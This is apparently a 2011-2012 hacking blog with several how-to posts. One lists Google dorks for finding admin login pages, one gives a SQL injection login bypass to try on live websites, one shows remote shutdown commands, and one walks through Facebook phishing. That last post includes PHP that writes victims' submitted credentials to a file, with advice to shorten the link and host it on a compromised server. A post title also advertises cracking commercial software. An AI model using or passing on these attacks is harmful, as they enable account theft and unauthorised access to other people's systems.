Your IP info..

IP address free counters

Sunday, 26 February 2012

HOW TO USE GOOGLE DORKS

Today am sharing simple posts of how to :
  1. How To Use Google Dorks 
 Google dorks are usefull during hacking, you can use the to find vulnerable site
example:
inurl:admin.asp 
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp 
inurl:adminlogin.php
inurl:administrator.
and you can specify the site when searching like:
admin.asp  site:herimoplanet92.com
admin.php site: google.com 
  

HACK ANY WEBSITE USING SQL


 HACK ANY WEBSITE USING SQL

You might have seen websites hacked by hackers. When I dont know about these hacks I think it is very technical. But it is quite simple. Sometimes hacking website is quite like eating a banana (lol).So lets start the tutorial.



In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).I will show you how to get into a website by using some google dorks and SQL query. By using SQL queries we can bypass the username and password and can enter into the admin panel. To hack a website simply follow these steps :-

> Use any of the google dork to find the admin login page of a website.


inurl:admin.asp 
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp
inurl:adminlogin.php
inurl:administrator



There are many websites which can be hacked by this. Open anyone and you will see the login page. Type this SQL query in form. 

Username : 1'or'1'='1
 
Password : 1'or'1'='1
Now where it asks for the User name, fill in that and do the same for the password.


Note : This is only for educational purposes. I am not responsible for any damage done by anyone.

If the site is vulnerable to this you will get into the admin panel. If it dont work then try other sites.
Written by Herimo92. like thap Page on facebook
or Send me email to Herimo Planet92 

Friday, 27 January 2012

How to Crack Internet Download Manager

Thursday, 5 January 2012

SHUTDOWN PC REMOTELY AND USING COMMAND


SHUTDOWN PC REMOTELY AND USING COMMAND 
Here we go
Am posting this to those who are sure of what they are doing, Am not responsible for the Results!!!
How to turn off your PC using command prompt.
Shutdown your computer or network computer with simple commands.
1. Open command prompt
2. Type the following
shutdown -s and press enter.

If you want to specify the time, type
shutdown -s -t  20 and press enter. 20 means the number of seconds taken to shutdown, you can specify yours 

If you want to specify the time, and show a message/comment,
How to scare your pals with a message? type
shutdown -s -t 20 -c "SELF DESTRUCTION ACTIVATED, EVACUATE THE PLANET" and press enter.
thats so scaring lols
 Then if yuo want to shutdown a pc using ip
 shutdown -s -m \\computer_name/IP Aaddress
 

Tuesday, 29 November 2011

Note: Good News

NOTE
 THOSE WHO HAD PROBLEMS IN VIEWING THE CONTENTS ON MY SITE,
 WHEN YOU SEE AN ADD FOR ADF.LY,  
JUST CLICK ON THE SKIP ADD ON THE TOP RIGHT CORNER.
THANX

My Logo

 
You can also Vist this 
  • Biz Page 

Sunday, 9 October 2011

Hack FB with Phishing- Pre-mature post!


Hacking Facebook With Phishing For Noobs by NPJ

 Hello Friends,


Today i will be teaching the easiest way to hack Facebook Id.There are many people who want to Hack Facebook ID. Well here is the simplest, quickest and easiest method. It is called Phishing. In this method the victim is made to enter his login details on a fake facebook login page.
Well here it is
1) Go to facebook, and copy the source of login page to notepad.
2) Press Control + F
3) Search for action
4) You should get: action=www.facebook.com/login
5) Replace it with post.php
6) Beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:

<?php
header(”Location: Facebook “);
$handle = fopen(”passes.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

10) Save it as post.php and remember the save as file type to all files.
11) Make a new file in notepad, dont write anything, save it as: passes.txt
12) Upload all of them in a web hosting server.
13) Make the index.php url into tinyurl.com and send it to ur victim.
Most of the free web hosting servers donot allow phishing as it is against their TOS try hosting them on a server where you have a shell uploaded.
Related Posts Plugin for WordPress, Blogger...